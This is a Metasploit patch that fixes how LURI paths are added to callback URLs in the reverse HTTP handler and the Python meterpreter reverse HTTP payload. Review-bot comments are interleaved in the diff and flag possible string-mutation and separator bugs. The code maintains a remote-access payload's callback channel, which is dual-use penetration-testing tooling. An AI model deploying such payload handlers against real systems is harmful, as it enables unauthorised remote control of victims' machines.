From a74a7dde558368c49715c72101349de1be846b7a Mon Sep 17 00:00:00 2001
From: OJ
Date: Tue, 26 Jan 2016 00:34:19 +1000
Subject: [PATCH] More fixies for LURI in Python, and native too

---
 lib/msf/core/handler/reverse_http.rb | 24 +++++++++----------
 .../python/meterpreter_reverse_http.rb | 2 +-
 2 files changed, 12 insertions(+), 14 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 5315a90309..3d8a648aea 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -105,7 +105,7 @@ module ReverseHttp
       callback_host = "#{callback_name}:#{callback_port}"
     end
 
-    "#{scheme}://#{callback_host}#{luri}/"
+    "#{scheme}://#{callback_host}"
   end
 
   # Use the {#refname} to determine whether this handler uses SSL or not
@@ -264,12 +264,15 @@ protected
     uuid.arch ||= obj.arch
     uuid.platform ||= obj.platform
 
-    conn_id = nil
+    conn_id = luri
     if info[:mode] && info[:mode] != :connect
-      conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
+      conn_id << generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
+    else
+      conn_id << req.relative_resource
+      conn_id = conn_id[0...-1] if conn_id[-1] == '/'
     end
 
-    request_summary = "#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
+    request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
 
     # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
     if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
@@ -288,11 +288,6 @@ protected
 
     self.pending_connections += 1
 
-    unless luri.empty?
-      sep = conn_id && conn_id[0] == '/' ? '' : '/'
-      conn_id = "#{luri}#{sep}#{conn_id}"
-    end
-
     # Process the requested resource.
     case info[:mode]
     when :init_connect
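Review bot: `payload_uri` now returns neither the LURI nor a trailing '/', so any caller outside this diff that appended a path to its result (the old value always ended in '/') now yields host and resource with no separator unless the resource itself begins with '/'; only the create_session call at line 401 is adjusted in this commit. A one-line doc on the method, `# Returns scheme://host:port with no path; callers append LURI and conn_id themselves`, would make the new contract explicit. The method's definition starts before this hunk.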
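Review bot: `conn_id = luri` followed by `conn_id << …` appends in place to whatever String `luri` returns; if `luri` hands back a shared object (for example the datastore's LURI value or a memoized string) rather than a fresh copy, every request grows that value and later callback URLs and log lines carry the accumulated suffixes, and a frozen string would raise instead. Copy before mutating: `conn_id = luri.dup`. In the `else` branch `conn_id` is built from `req.relative_resource`, which any client can choose, and it now replaces the verbatim requested path in `request_summary`, so a comment such as `# connect mode: conn_id echoes the client-supplied resource path` would help the next reader. With the separator logic removed from the hunk at line 288, this concatenation also assumes that `luri` and the `generate_uri_uuid` result each begin with '/', which cannot be confirmed from the diff. The enclosing on_request method starts and ends outside this hunk.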
@@ -401,15 +399,15 @@ protected
 
       print_status("Attaching orphaned/stageless session...")
       resp.body = ''
-      unless conn_id
-        conn_id = "#{luri}#{req.relative_resource}"
-      end
+
+      url = payload_uri(req) + conn_id
+      url << '/' unless url[-1] == '/'
 
       # Short-circuit the payload's handle_connection processing for create_session
       create_session(cli, {
         :passive_dispatcher => obj.service,
         :conn_id => conn_id,
-        :url => payload_uri(req) + conn_id + "/\x00",
+        :url => url + "\x00",
         :expiration => datastore['SessionExpirationTimeout'].to_i,
         :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
         :retry_total => datastore['SessionRetryTotal'].to_i,
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index 972e60276d..3ff53c83c1 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -35,7 +35,7 @@ module MetasploitModule
   def generate_reverse_http(opts={})
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url: luri + generate_callback_url(opts),
+      http_url: generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]
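Review bot: The new `url` is deliberately forced to end in '/' while the `conn_id` it is built from (assembled earlier in on_request, outside this hunk) is stored without its trailing slash, but nothing in the code says the two shapes differ on purpose. A short comment above the `url << '/'` line, `# the session URL must end in '/'; conn_id is kept without it`, would stop a later cleanup from "harmonizing" them. The `<<` here is safe because `payload_uri(req) + conn_id` returns a fresh String, which is worth stating since the same operator elsewhere in this commit mutates its receiver. The enclosing case branch begins before this hunk.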
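Review bot: Dropping the `luri +` prefix is only correct if `generate_callback_url` now emits the LURI itself; that helper is not part of this diff, so if it was not changed in a companion commit the Python stageless payload will post to the callback root and never reach the LURI-prefixed handler path. A brief comment on the new line, `# generate_callback_url already includes LURI; do not prepend it again`, plus a pointer to the handler change in the commit message, would make the dependency visible. generate_reverse_http continues past the end of this hunk.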